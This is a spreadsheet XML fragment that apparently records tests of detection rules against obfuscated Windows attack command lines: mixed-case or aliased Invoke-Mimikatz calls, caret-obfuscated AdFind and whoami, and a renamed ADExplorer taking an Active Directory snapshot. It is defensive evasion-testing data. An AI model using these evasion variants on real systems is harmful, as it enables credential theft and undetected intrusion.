    <row r="1372" ht="15.75" customHeight="1" s="42">
      <c r="A1372" s="43" t="n"/>
      <c r="B1372" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1372" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1372" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1372" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1372" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1372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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1372" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1373" ht="15.75" customHeight="1" s="42">
      <c r="A1373" s="43" t="n"/>
      <c r="B1373" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1373" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1373" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1373" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1373" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1373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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1373" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1374" ht="15.75" customHeight="1" s="42">
      <c r="A1374" s="43" t="n"/>
      <c r="B1374" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1374" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1374" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1374" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1374" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I137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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1374" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1375" ht="15.75" customHeight="1" s="42">
      <c r="A1375" s="43" t="n"/>
      <c r="B1375" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1375" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1375" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1375" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1375" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I137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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1375" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1376" ht="15.75" customHeight="1" s="42">
      <c r="A1376" s="43" t="n"/>
      <c r="B1376" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1376" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1376" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1376" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1376" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1376" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1376" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I137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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1376" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1377" ht="15.75" customHeight="1" s="42">
      <c r="A1377" s="43" t="n"/>
      <c r="B1377" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1377" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1377" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1377" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1377" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1377" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1377" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1377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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1377" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1378" ht="15.75" customHeight="1" s="42">
      <c r="A1378" s="43" t="n"/>
      <c r="B1378" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1378" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1378" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1378" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1378" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1378" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1378" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1378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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1378" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1379" ht="15.75" customHeight="1" s="42">
      <c r="A1379" s="43" t="n"/>
      <c r="B1379" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1379" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1379" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1379" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1379" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1379" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1379" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I137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79" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1379" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1380" ht="15.75" customHeight="1" s="42">
      <c r="A1380" s="43" t="n"/>
      <c r="B1380" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1380" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1380" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1380" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1380" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1380" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1380" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1380" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1381" ht="15.75" customHeight="1" s="42">
      <c r="A1381" s="43" t="n"/>
      <c r="B1381" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1381" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1381" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1381" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1381" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1381" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1381" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1381" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1382" ht="15.75" customHeight="1" s="42">
      <c r="A1382" s="43" t="n"/>
      <c r="B1382" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1382" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1382" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1382" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1382" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1382" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1382" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1382" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1383" ht="15.75" customHeight="1" s="42">
      <c r="A1383" s="43" t="n"/>
      <c r="B1383" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1383" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1383" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1383" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1383" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1383" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1383" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1383" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1384" ht="15.75" customHeight="1" s="42">
      <c r="A1384" s="43" t="n"/>
      <c r="B1384" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1384" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1384" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1384" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1384" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1384" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1384" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1384" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1385" ht="15.75" customHeight="1" s="42">
      <c r="A1385" s="43" t="n"/>
      <c r="B1385" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1385" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1385" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1385" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1385" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1385" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1385" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1385" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1386" ht="15.75" customHeight="1" s="42">
      <c r="A1386" s="43" t="n"/>
      <c r="B1386" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1386" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1386" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1386" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1386" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1386" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1386" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I138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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1386" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1387" ht="15.75" customHeight="1" s="42">
      <c r="A1387" s="43" t="n"/>
      <c r="B1387" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1387" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1387" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1387" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1387" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1387" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1387" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1387" s="36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387" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1387" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1388" ht="15.75" customHeight="1" s="42">
      <c r="A1388" s="43" t="n"/>
      <c r="B1388" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_susp_usage</t>
        </is>
      </c>
      <c r="C1388" s="36" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution</t>
        </is>
      </c>
      <c r="D1388" s="36" t="inlineStr">
        <is>
          <t>9a132afa-654e-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E1388" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" adfind.exe d^o^m^a^i^n^l^i^s^t</t>
        </is>
      </c>
      <c r="F1388" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1388" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1388" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1388" s="43" t="inlineStr">
        <is>
          <t>PUA - AdFind Suspicious Execution (9a132afa-654e-11eb-ae93-0242ac130002); Renamed AdFind Execution (df55196f-f105-44d3-a675-e9dfb6cc2f2b)</t>
        </is>
      </c>
      <c r="J1388" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1388" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1389" ht="15.75" customHeight="1" s="42">
      <c r="A1389" s="43" t="n"/>
      <c r="B1389" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1389" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1389" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1389" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1389" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1389" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1389" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1389" s="43" t="n"/>
      <c r="J1389" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1389" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1390" ht="15.75" customHeight="1" s="42">
      <c r="A1390" s="43" t="n"/>
      <c r="B1390" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1390" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1390" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1390" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1390" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1390" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1390" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1390" s="36" t="n"/>
      <c r="J1390" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1390" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1391" ht="15.75" customHeight="1" s="42">
      <c r="A1391" s="43" t="n"/>
      <c r="B1391" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1391" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1391" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1391" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAND "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1391" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1391" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1391" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1391" s="43" t="n"/>
      <c r="J1391" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1391" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1392" ht="15.75" customHeight="1" s="42">
      <c r="A1392" s="43" t="n"/>
      <c r="B1392" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1392" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1392" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1392" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commAnD "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1392" s="43" t="n"/>
      <c r="J1392" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1392" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1393" ht="15.75" customHeight="1" s="42">
      <c r="A1393" s="43" t="n"/>
      <c r="B1393" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1393" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1393" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1393" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1393" s="43" t="n"/>
      <c r="J1393" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1393" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1394" ht="15.75" customHeight="1" s="42">
      <c r="A1394" s="43" t="n"/>
      <c r="B1394" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_execution</t>
        </is>
      </c>
      <c r="C1394" s="36" t="inlineStr">
        <is>
          <t>Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1394" s="36" t="inlineStr">
        <is>
          <t>9212f354-7775-4e28-9c9f-8f0a4544e664</t>
        </is>
      </c>
      <c r="E1394" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -command "Start-Process -FilePath 'ADExplorer.exe' -ArgumentList '/passive /log:C:\temp\adexplorer.log'"</t>
        </is>
      </c>
      <c r="F1394" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1394" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1394" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1394" s="36" t="n"/>
      <c r="J1394" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1394" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1395" ht="15.75" customHeight="1" s="42">
      <c r="A1395" s="43" t="n"/>
      <c r="B1395" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C1395" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1395" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E1395" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\Windows\System32\advapi32.dll SomeFunction</t>
        </is>
      </c>
      <c r="F1395" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1395" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1395" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1395" s="36" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702); Potential WinAPI Calls Via CommandLine (ba3f5c1b-6272-4119-9dbd-0bc8d21c2702)</t>
        </is>
      </c>
      <c r="J1395" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1395" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1396" ht="15.75" customHeight="1" s="42">
      <c r="A1396" s="43" t="n"/>
      <c r="B1396" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C1396" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1396" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E1396" s="36" t="inlineStr">
        <is>
          <t>cmd /"c" "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F1396" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1396" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1396" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1396" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1396" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1396" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1397" ht="15.75" customHeight="1" s="42">
      <c r="A1397" s="43" t="n"/>
      <c r="B1397" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C1397" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D1397" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E1397" s="36" t="inlineStr">
        <is>
          <t>cmd -"c" "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F1397" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1397" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1397" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1397" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1397" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1397" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1398" ht="15.75" customHeight="1" s="42">
      <c r="A1398" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1398" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1398" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1398" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1398" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F1398" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1398" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1398" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1398" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J1398" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1398" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1399" ht="15.75" customHeight="1" s="42">
      <c r="A1399" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1399" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1399" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1399" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1399" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F1399" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1399" s="36" t="b">
